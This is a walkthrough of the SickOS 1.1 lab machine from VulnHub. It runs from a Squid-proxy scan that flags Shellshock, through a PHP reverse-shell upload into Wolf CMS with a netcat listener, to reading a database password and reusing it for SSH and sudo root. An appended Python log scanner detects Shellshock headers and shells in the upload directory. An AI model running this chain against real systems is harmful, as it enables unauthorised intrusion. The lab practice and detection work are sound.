Download: https://download.vulnhub.com/sickos/sick0s1.1.7z
Target machine address: 192.168.243.137
Attacking machine address: 192.168.18.148
Information gathering
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
| 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open http-proxy Squid http proxy 3.1.19
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
8080/tcp closed http-proxy
MAC Address: 00:0C:29:C6:40:31 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Scanning
root@kali:~# nikto -h 192.168.243.137 -useproxy 192.168.243.137:3128
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
Port 3128 is an HTTP proxy, so set it as the proxy in the browser.
wolfcms
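A CMS is present... so where is the administrator interface?
Found the permissions available under the Files panel.
Upload a web shell and request it [the shell at /usr/share/webshells/php-reverse-shell.php can be used]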
http://192.168.243.137/wolfcms/public/php-reverse-shell_1.php
Netcat listener
nc -lnvp 443
Reverse shell
Take a look: $ cat /var/www/wolfcms/config.php
Found the database account
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
SSH login
Since port 22 is open, SSH can be used
root@kali:~# ssh sickos@192.168.243.137
Password: john@123
sudo privilege escalation
sudo su root
Password: john@123
Got the flag
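
Seen from the defender's side, a Shellshock check like the one nikto reported for /cgi-bin/status and the PHP file requested from /wolfcms/public/ both leave traces in the web server's access log. The following is an added example, not part of the original write-up: a Python scan over constructed log lines, where the Apache combined log format, the sample entries and the function name scan are assumptions.

```python
import re

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)
# A header value containing a bash function definition "() {" is the Shellshock marker.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')
# Script files requested from the CMS upload directory named on this page.
UPLOAD_SCRIPT_RE = re.compile(r'^/wolfcms/public/[^?#]*\.(?:php\d?|phtml)(?:$|[?/])', re.I)

# Constructed sample lines (not captured from the lab). The source address assumes
# that requests relayed by the Squid proxy arrive from the host's own IP.
SAMPLE_LOG = [
    '192.168.243.137 - - [01/Jan/2020:10:00:01 +0000] "GET /wolfcms/ HTTP/1.1" 200 3975 "-" "Mozilla/5.0"',
    '192.168.243.137 - - [01/Jan/2020:10:00:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 197 "-" "() { :; }; echo probe"',
    '192.168.243.137 - - [01/Jan/2020:10:04:12 +0000] "GET /wolfcms/public/php-reverse-shell_1.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.168.243.137 - - [01/Jan/2020:10:04:30 +0000] "GET /wolfcms/public/images/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    'truncated or malformed entry',
]


def scan(lines):
    """Return (line_number, reason) for every log line worth an analyst's attention."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = LOG_RE.match(line.strip())
        if match is None:
            # Unparseable lines are reported, not silently dropped.
            findings.append((number, 'unparsed'))
            continue
        # Only Referer and User-Agent are logged; other headers need a WAF or packet capture.
        if SHELLSHOCK_RE.search(match['referer']) or SHELLSHOCK_RE.search(match['agent']):
            findings.append((number, 'shellshock-header'))
        if UPLOAD_SCRIPT_RE.match(match['path']):
            findings.append((number, 'script-in-upload-dir'))
    return findings


if __name__ == '__main__':
    for number, reason in scan(SAMPLE_LOG):
        print(f'line {number}: {reason}')
```

Because every proxied request shares one source address in this layout, attributing a finding to a client means correlating it with the Squid access log by timestamp.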